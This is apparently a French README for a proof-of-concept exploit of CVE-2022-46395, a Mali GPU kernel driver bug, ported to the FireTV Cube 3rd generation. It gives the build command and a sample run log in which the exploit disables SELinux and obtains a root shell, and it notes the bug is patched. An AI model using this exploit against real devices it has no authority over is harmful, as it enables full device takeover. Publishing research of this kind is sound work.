
CVE-2022-46395 Preuve de concept pour FireTV Cube 3e génération (gazelle)
Ceci est un fork du chercheur en sécurité Man Yue Mo Pixel 6 POC pour CVE-2022-46395. Lisez son analyse détaillée de la vulnérabilité ici. Des modifications ont été apportées pour tenir compte de l'espace utilisateur 32 bits de FireOS. Le POC exploite un bug dans le pilote noyau ARM Mali pour obtenir une exécution de code noyau arbitraire, qui est ensuite utilisée pour désactiver SELinux et obtenir root.
L'exploit a été corrigé dans PS7664/3772 (septembre 2023). Pour référence, la commande suivante a été utilisée pour compiler avec clang dans ndk-21 :
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o gazelle_buf
Pour des résultats plus rapides, exécutez après un redémarrage frais. En moyenne, le POC prend 20 à 60 secondes pour obtenir root.
gazelle:/ $ /data/local/tmp/gazelle_buf
fingerprint: Amazon/gazelle/gazelle:9/PS7652.3564N/0028488625152:user/amz-p,release-keys
benchmark_time 102
failed after 100
finished reset: 919423975 fault: 918468559 3795 err 0 read 3
found pgd at page 8
overwrite addr : 104100558 558
overwrite addr : 104300558 558
overwrite addr : 10410082c 82c
overwrite addr : 10430082c 82c
result 50
success after 128
gazelle:/ #